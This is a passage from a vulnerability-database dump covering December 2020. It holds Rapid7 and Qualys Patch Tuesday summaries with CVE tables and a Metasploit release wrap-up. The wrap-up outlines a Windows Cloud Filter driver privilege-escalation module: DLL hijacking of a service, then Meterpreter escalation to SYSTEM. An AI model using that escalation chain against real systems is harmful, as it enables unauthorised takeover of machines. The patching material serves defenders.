{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-01-14T00:00:00", "type": "googleprojectzero", "title": "\nHunting for Bugs in Windows Mini-Filter Drivers\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0877", "CVE-2019-0836", "CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136", "CVE-2020-17139"], "modified": "2021-01-14T00:00:00", "id": "GOOGLEPROJECTZERO:1D4D205F47235FA1B34F16AE73563B14", "href": "https://googleprojectzero.blogspot.com/2021/01/hunting-for-bugs-in-windows-mini-filter.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2020-12-12T10:47:13", "description": "\n\nWe close off our 2020 year of Patch Tuesdays with 58 vulnerabilities being addressed. While it's a higher count than our typical December months (high thirties), it's still a nice breath of fresh air given how the past year has been. We do, however, get to celebrate that none of the reported vulnerabilities covered this month has been publicly exploited nor previously publicly disclosed and only 9 of the 58 vulnerabilities have been marked as Critical by Microsoft.\n\nIn terms of actionables, standard procedures can be followed here in terms of how to prioritize which sets of patches to apply first with two exceptions.\n\n## Microsoft Office vulnerabilities\n\nA fair amount of remote code executions targeting Microsoft Excel are being patched up today and while none of them have the Preview Pane set as an attack vector, the volume of remote code execution vulnerabilities pertaining to Microsoft Office this month may suggest a slight re-jig of priorities. That's our first (minor) exception.\n\nThe next exception is likely the most notable piece behind this December 2020 Patch Tuesday: Microsoft Exchange Server.\n\n## Microsoft Exchange Server vulnerabilities\n\nWhile there are a total of six vulnerabilities from Microsoft Exchange Server this month, two of them garner a CVSS score of 9.1 ([CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>), [CVE-2020-17142](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17142>)) and one is noted by Microsoft has having a higher chance of exploitability ([CVE-2020-17144](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17144>)). These three warrant an additional examination and may be grounds for prioritizing patching.\n\nThere is currently suspicion that [CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>) helps address the patch bypass of [CVE-2020-16875](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16875>) (CVSS 8.4) from September 2020. As well, both [CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>) and [CVE-2020-17142](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17142>) are remote code execution vulnerabilities occurring due to improper validation of cmdlet arguments that affect all supported (as of writing) versions of Microsoft Exchange. One important note to consider is while these vulnerabilities have received a CVSS score of 9.1 and do not require additional user interaction, an attacker must be in an authenticated role in order to exploit this vulnerability.\n\nIn contrast, [CVE-2020-17144](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17144>) which is another remote code execution vulnerability also stemming from improper validation for cmdlet arguments, this one only affects Exchange Server 2010 SP3 and does require additional user interaction to successfully execute. This is extra interesting as [Microsoft Exchange Server 2010 passed end of life back on October 22, 2020](<https://techcommunity.microsoft.com/t5/exchange-team-blog/microsoft-extending-end-of-support-for-exchange-server-2010-to/ba-p/753591>). The introduction of this post-EOL patch for Microsoft Exchange Server 2010 coupled with Microsoft noting this vulnerability to be more likely exploitable does suggest prioritizing this patch a bit earlier.\n\n## New Summary Tables\n\nIn an attempt to provide a bit more summarizing tables, here are this month's patched vulnerabilities split by the product family.\n\n### Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17160>) | Azure Sphere Security Feature Bypass Vulnerability | False | False | 7.4 | True \n[CVE-2020-16971](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16971>) | Azure SDK for Java Security Feature Bypass Vulnerability | False | False | 7.4 | False \n \n### Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17153](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17153>) | Microsoft Edge for Android Spoofing Vulnerability | False | False | 4.3 | True \n[CVE-2020-17131](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17131>) | Chakra Scripting Engine Memory Corruption Vulnerability | False | False | 4.2 | False \n \n### Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17148>) | Visual Studio Code Remote Development Extension Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17150](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17150>) | Visual Studio Code Remote Code Execution Vulnerability | False | False | 7.8 | False \n[CVE-2020-17156](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17156>) | Visual Studio Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17159](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17159>) | Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability | False | False | 7.8 | False \n[CVE-2020-17002](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17002>) | Azure SDK for C Security Feature Bypass Vulnerability | False | False | 7.4 | False \n[CVE-2020-17135](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17135>) | Azure DevOps Server Spoofing Vulnerability | False | False | 6.4 | False \n[CVE-2020-17145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17145>) | Azure DevOps Server and Team Foundation Services Spoofing Vulnerability | False | False | 5.4 | False \n \n### ESU Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17140](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17140>) | Windows SMB Information Disclosure Vulnerability | False | False | 8.1 | True \n[CVE-2020-16958](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16958>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16959](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16959>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16960](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16960>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16961](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16961>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16962](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16962>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16963](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16963>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16964](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16964>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17098>) | Windows GDI+ Information Disclosure Vulnerability | False | False | 5.5 | True \n \n### Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17132](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17132>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 9.1 | True \n[CVE-2020-17142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17142>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 9.1 | True \n[CVE-2020-17143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17143>) | Microsoft Exchange Information Disclosure Vulnerability | False | False | 8.8 | True \n[CVE-2020-17141](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17141>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 8.4 | True \n[CVE-2020-17144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17144>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 8.4 | True \n[CVE-2020-17117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17117>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 6.6 | False \n \n### Microsoft Dynamics Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17152](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17152>) | Microsoft Dynamics 365 for Finance and Operations (on-premises) Remote Code Execution Vulnerability | False | False | 8.8 | True \n[CVE-2020-17158](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17158>) | Microsoft Dynamics 365 for Finance and Operations (on-premises) Remote Code Execution Vulnerability | False | False | 8.8 | True \n[CVE-2020-17147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17147>) | Dynamics CRM Webclient Cross-site Scripting Vulnerability | False | False | 8.7 | True \n[CVE-2020-17133](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17133>) | Microsoft Dynamics Business Central/NAV Information Disclosure | False | False | 6.5 | True \n \n### Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17121](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17121>) | Microsoft SharePoint Remote Code Execution Vulnerability | False | False | 8.8 | True \n[CVE-2020-17118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17118>) | Microsoft SharePoint Remote Code Execution Vulnerability | False | False | 8.1 | False \n[CVE-2020-17115](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17115>) | Microsoft SharePoint Spoofing Vulnerability | False | False | 8 | True \n[CVE-2020-17122](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17122>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17123](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17123>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17124](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17124>) | Microsoft PowerPoint Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17125>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17127](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17127>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17128](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17128>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17129](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17129>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17089](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17089>) | Microsoft SharePoint Elevation of Privilege Vulnerability | False | False | 7.1 | False \n[CVE-2020-17119](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17119>) | Microsoft Outlook Information Disclosure Vulnerability | False | False | 6.5 | True \n[CVE-2020-17130](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17130>) | Microsoft Excel Security Feature Bypass Vulnerability | False | False | 6.5 | True \n[CVE-2020-17126](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17126>) | Microsoft Excel Information Disclosure Vulnerability | False | False | 5.5 | True \n[CVE-2020-17120](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17120>) | Microsoft SharePoint Information Disclosure Vulnerability | False | False | 5.3 | True \n \n### Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17095](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17095>) | Hyper-V Remote Code Execution Vulnerability | False | False | 8.5 | True \n[CVE-2020-17092](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17092>) | Windows Network Connections Service Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17134](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17134>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17136](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17136>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17137](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17137>) | DirectX Graphics Kernel Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17139](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17139>) | Windows Overlay Filter Security Feature Bypass Vulnerability | False | False | 7.8 | False \n[CVE-2020-17096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17096>) | Windows NTFS Remote Code Execution Vulnerability | False | False | 7.5 | True \n[CVE-2020-17103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17103>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | False | False | 7 | False \n[CVE-2020-17099](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17099>) | Windows Lock Screen Security Feature Bypass Vulnerability | False | False | 6.8 | True \n[CVE-2020-16996](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16996>) | Kerberos Security Feature Bypass Vulnerability | False | False | 6.5 | True \n[CVE-2020-17094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17094>) | Windows Error Reporting Information Disclosure Vulnerability | False | False | 5.5 | True \n[CVE-2020-17138](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17138>) | Windows Error Reporting Information Disclosure Vulnerability | False | False | 5.5 | True \n[CVE-2020-17097](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17097>) | Windows Digital Media Receiver Elevation of Privilege Vulnerability | False | False | 3.3 | False \n \n## Summary Graphs\n\n", "cvss3": {}, "published": "2020-12-08T21:36:27", "type": "rapid7blog", "title": "Patch Tuesday - December 2020", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-16875", "CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-16971", "CVE-2020-16996", "CVE-2020-17002", "CVE-2020-17089", "CVE-2020-17092", "CVE-2020-17094", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17099", "CVE-2020-17103", "CVE-2020-17115", "CVE-2020-17117", "CVE-2020-17118", "CVE-2020-17119", "CVE-2020-17120", "CVE-2020-17121", "CVE-2020-17122", "CVE-2020-17123", "CVE-2020-17124", "CVE-2020-17125", "CVE-2020-17126", "CVE-2020-17127", "CVE-2020-17128", "CVE-2020-17129", "CVE-2020-17130", "CVE-2020-17131", "CVE-2020-17132", "CVE-2020-17133", "CVE-2020-17134", "CVE-2020-17135", "CVE-2020-17136", "CVE-2020-17137", "CVE-2020-17138", "CVE-2020-17139", "CVE-2020-17140", "CVE-2020-17141", "CVE-2020-17142", "CVE-2020-17143", "CVE-2020-17144", "CVE-2020-17145", "CVE-2020-17147", "CVE-2020-17148", "CVE-2020-17150", "CVE-2020-17152", "CVE-2020-17153", "CVE-2020-17156", "CVE-2020-17158", "CVE-2020-17159", "CVE-2020-17160"], "modified": "2020-12-08T21:36:27", "id": "RAPID7BLOG:99D9180FBF3F900ADB0CDC5EF79EC080", "href": "https://blog.rapid7.com/2020/12/08/patch-tuesday-december-2020/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T20:57:23", "description": "## Commemorating the 2020 December Metasploit community CTF\n\n\n\nA new commemorative banner has been added to the Metasploit console to celebrate the teams that participated in the [2020 December Metasploit community CTF](<https://blog.rapid7.com/2020/12/07/congrats-to-the-winners-of-the-2020-december-metasploit-community-ctf/>) and achieved 100 or more points:\n\n\n\nIf you missed out on participating in this most recent event, be sure to follow the [Metasploit Twitter](<https://twitter.com/metasploit>) and [Metasploit blog posts](<https://blog.rapid7.com/tag/metasploit/>). If there are any future Metasploit CTF events, all details will be announced there!\n\nIf the banners aren\u2019t quite your style, you can always disable them with the `quiet` flag:\n \n \n msfconsole -q\n \n\n## Windows privilege escalation via Cloud Filter driver\n\nOur very own [gwillcox-r7](<https://github.com/gwillcox-r7>) has created a new module for [CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP](<https://github.com/rapid7/metasploit-framework/pull/14585>), with credit to James Foreshaw for the initial vulnerability discovery and proof of concept. The Cloud Filter driver, `cldflt.sys`, on Windows 10 v1803 and later, prior to December 2020, did not set the `IO_FORCE_ACCESS_CHECK` or `OBJ_FORCE_ACCESS_CHECK` flags when calling `FltCreateFileEx()` and `FltCreateFileEx2()` within its `HsmpOpCreatePlaceholders()` function with attacker-controlled input. This meant that files were created with `KernelMode` permissions, thereby bypassing any security checks that would otherwise prevent a normal user from being able to create files in directories they don't have permissions to create files in.\n\nThis module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. Users are strongly encouraged to set the `PAYLOAD` option to one of the Meterpreter payloads, as doing so will allow them to subsequently escalate their new session from `NETWORK SERVICE` to `SYSTEM` by using Meterpreter's `getsystem` command to perform RPCSS Named Pipe Impersonation and impersonate the `SYSTEM` user.\n\n## New Modules (3)\n\n * [WordPress AIT CSV Import Export Unauthenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14572>) by h00die This adds an exploit module for various versions of the `AIT CSV Import / Export` plugin for Wordpress. This module exploits an unauthenticated file upload vulnerability in plugin versions below `v3.0.4` to gain code execution against Wordpress installations.\n * [CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP](<https://github.com/rapid7/metasploit-framework/pull/14585>) by Grant Willcox and James Foreshaw, which exploits [CVE-2020-17136](<https://attackerkb.com/topics/1yvp3hVNSN/cve-2020-17136?referrer=blog>), an arbitrary file write vulnerability within cldflt.sys. The result yields local code execution as the Network Service account which is suitable for escalating to SYSTEM via documented techniques.\n * [Windows Manage Volume Shadow Copies](<https://github.com/rapid7/metasploit-framework/pull/14582>) by [zeroSteiner](<https://github.com/zeroSteiner>) This adds the possibility to run post module actions as commands. This also consolidates and improves existing VSS modules into one new single module with multiple actions.\n\n## Enhancements and Features\n\n * [#14562](<https://github.com/rapid7/metasploit-framework/pull/14562>) from [zeroSteiner](<https://github.com/zeroSteiner>) Improves the readability of Meterpreter error messages by replacing the command ID with the command name\n * [#14582](<https://github.com/rapid7/metasploit-framework/pull/14582>) from [zeroSteiner](<https://github.com/zeroSteiner>) This adds the possibility to run post module actions as commands. This also consolidates and improves existing VSS modules into one new single module with multiple actions.\n * [#14600](<https://github.com/rapid7/metasploit-framework/pull/14600>) from [zeroSteiner](<https://github.com/zeroSteiner>) The FileSystem mixin has been reorganized and a number of function aliases have been added to assist developers in using the module. Additionally new YARD documentation has been added to better explain the functionality of several of the FileSystem mixin's functions to assist developers in determining when to use these functions.\n * [#14606](<https://github.com/rapid7/metasploit-framework/pull/14606>) from [bwatters-r7](<https://github.com/bwatters-r7>) This adds a banner commemorating all of the teams that participated in the Q4 2020 CTF.\n\n## Bugs Fixed\n\n * [#14515](<https://github.com/rapid7/metasploit-framework/pull/14515>) from [timwr](<https://github.com/timwr>) This fixes an issue with both cmd/unix/reverse_awk and cmd/unix/bind_awk payloads that were not correctly terminating when after a session was closed. This was causing endless session creations and high CPU consumption on the target.\n * [#14605](<https://github.com/rapid7/metasploit-framework/pull/14605>) from [zeroSteiner](<https://github.com/zeroSteiner>) This PR fixes an issue where the `VHOST` option was not being correctly populated when the `RHOST` option was a domain name\n * [#14613](<https://github.com/rapid7/metasploit-framework/pull/14613>) from [adfoster-r7](<https://github.com/adfoster-r7>) Fixes a regression error with modules depending on NTLM such as cve_2019_0708_bluekeep\n * [#14614](<https://github.com/rapid7/metasploit-framework/pull/14614>) from [zeroSteiner](<https://github.com/zeroSteiner>) A bug within the module for [CVE-2020-17136](<https://attackerkb.com/topics/1yvp3hVNSN/cve-2020-17136?referrer=blog>) occurred where a relative path was used instead of an absolute path when attempting to load the C# exploit exe. The code has been replaced with a call to `File.expand_path()` to allow the module to dynamically determine the full path to this file, allowing users to use the module regardless of which directory they are in when running `msfconsole`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.25...6.0.26](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-01-07T10%3A58%3A16%2B00%3A00..2021-01-14T17%3A51%3A07%2B00%3A00%22>)\n * [Full diff 6.0.25...6.0.26](<https://github.com/rapid7/metasploit-framework/compare/6.0.25...6.0.26>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-01-15T20:00:13", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1170", "CVE-2020-17136"], "modified": "2021-01-15T20:00:13", "id": "RAPID7BLOG:0165B62C20478239D1C1B73C779FA6F0", "href": "https://blog.rapid7.com/2021/01/15/metasploit-wrap-up-94/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2020-12-12T10:20:59", "description": "This month\u2019s Microsoft Patch Tuesday addresses 58 vulnerabilities with 9 of them labeled as Critical. The 9 Critical vulnerabilities cover Exchange, SharePoint, Hyper-V, Chakra Scripting, and several other workstation vulnerabilities. Adobe released patches today for Experience Manager, Prelude, Lightroom and [pre-notification security advisory for Acrobat and Reader](<https://blogs.adobe.com/psirt/?p=1957>).\n\n### Workstation Patches\n\nToday\u2019s Patch Tuesday fixes vulnerabilities that would impact workstations. The Office, Edge, Chakra vulnerabilities should be prioritized for workstation-type devices, meaning any system that is used for email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.\n\n### Microsoft Exchange RCE\n\nMicrosoft patched five Remote Code Execution vulnerabilities in Exchange ([CVE-2020-17141](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17141>), [](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17142>)[CVE-2020-17142](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17142>), [CVE-2020-17144,](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17144>) [CVE-2020-17117](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17117>), [CVE-2020-17132](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17132>)), which would allow an attacker to run code as system by sending a malicious email. Microsoft does rank them as \u201cExploitation Less Likely,\u201d but due to the open attack vector, these patches should be prioritized on all Exchange Servers.\n\n### SharePoint RCE\n\nMicrosoft patched two RCEs ([CVE-2020-17121](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17121>) and [CVE-2020-17118](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17118>)) in SharePoint. [CVE-2020-17121](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17121>) allows an authenticated attacker to gain access to create a site and execute code remotely within the kernel. Because of this, it is highly recommended to prioritize these patches across all SharePoint deployments.\n\n### Hyper-V RCE\n\nMicrosoft also patched an RCE vulnerability in Hyper-V ([CVE-2020-17095](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17095>)) which allows an attacker to run malicious programs on Hyper-V virtual machine to execute arbitrary code on the host system when it fails to properly validate vSMB packet data. This should be prioritized on all Hyper-V systems.\n\n### Windows NTFS RCE\n\nWhile listed as Important, there is a RCE vulnerability ([CVE-2020-17096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17096>)) in Microsoft Windows. A local attacker could exploit this vulnerability to elevate the attacker&#x27;s privileges or a remote attacker with SMBv2 access to affected system could send malicious requests over the network. \n\n### Windows Lock Screen Security Bypass\n\nAn important vulnerability is patched by Microsoft ([CVE-2020-17099](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17099>)) where an attacker with physical access to the target system could perform actions on a locked system, thereby executing code from Windows lock screen in the context of the active user session. This patch should be prioritized across all Windows devices.\n\n### Adobe\n\nAdobe issued patches today covering multiple vulnerabilities in [Adobe Experience Manager](<https://helpx.adobe.com/security/products/experience-manager/apsb20-72.html>), [Lightroom](<https://helpx.adobe.com/security/products/lightroom/apsb20-74.html>), [Prelude](<https://helpx.adobe.com/security/products/reader-mobile/apsb20-71.htmlhttps://helpx.adobe.com/security/products/prelude/apsb20-70.html>) and [Pre-notification Security Advisory for Acrobat and Reader](<https://helpx.adobe.com/security/products/acrobat/apsb20-75.html>). The patches for Experience Manager and Acrobat/Reader are labeled as [Priority 2 ](<https://helpx.adobe.com/security/severity-ratings.html>), while the remaining patches are set to [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>).\n\nWhile none of the vulnerabilities disclosed in Adobe\u2019s release are known to be Actively Attacked today, all patches should be prioritized on systems with these products installed.\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>).", "cvss3": {}, "published": "2020-12-08T20:26:44", "type": "qualysblog", "title": "December 2020 Patch Tuesday \u2013 58 Vulnerabilities, 9 Critical, Windows Exchange, Hyper-V, SharePoint, Adobe", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17099", "CVE-2020-17117", "CVE-2020-17118", "CVE-2020-17121", "CVE-2020-17132", "CVE-2020-17141", "CVE-2020-17142", "CVE-2020-17144"], "modified": "2020-12-08T20:26:44", "id": "QUALYSBLOG:D6BB8795D96ECAD5C95596F19210BB13", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-12-31T15:44:36", "description": "None\n**NEW 12/8/20 \nIMPORTANT **Adobe Flash Player will go out of support on December 31, 2020. For more information, see [Adobe Flash end of support on December 31, 2020](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support#:~:text=Adobe%20will%20end%20support%20of,site%2Dby%2Dsite%20basis.>). Flash content will be blocked from running in Flash Player beginning January 12, 2021. For more information, see [Adobe Flash Player EOL General Information Page](<https://www.adobe.com/products/flashplayer/end-of-life.html>).\n\n**IMPORTANT** Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).\n\nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Security updates to Windows Graphics, Windows 